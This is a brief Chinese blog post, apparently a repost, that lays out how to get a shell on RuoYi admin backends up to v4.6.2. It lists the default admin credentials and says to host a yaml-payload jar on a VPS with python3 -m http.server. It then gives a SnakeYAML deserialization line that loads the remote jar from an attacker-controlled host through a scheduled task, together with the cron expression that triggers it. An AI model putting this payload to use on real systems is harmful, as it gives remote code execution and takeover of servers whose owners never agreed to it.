若依后台Getshell - yunying - 博客园
2022-3-1 13:36:29 Author: www.cnblogs.com(查看原文) 阅读量:2182 收藏

RuoYi <= v4.6.2
默认admin/admin123
修改artsploit
windows主机反弹shell可以用https://github.com/bkfish/yaml-payload-for-Win
放到vps上,起一个python3
python3 -m http.server
配置完后,后台添加定时任务
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]')
然后Con表达式设置成0/50 * * * * ?即可

历史漏洞:
https://doc.ruoyi.vip/ruoyi/document/kslj.html#历史漏洞
新增:
https://xz.aliyun.com/t/10637

posted @ 2021-12-08 14:32  yunying  阅读(296)  评论(0编辑  收藏  举报

Copyright © 2022 yunying
Powered by .NET 6 on Kubernetes


文章来源: https://www.cnblogs.com/BOHB-yunying/p/15661384.html
如有侵权请联系:admin#unsafe.sh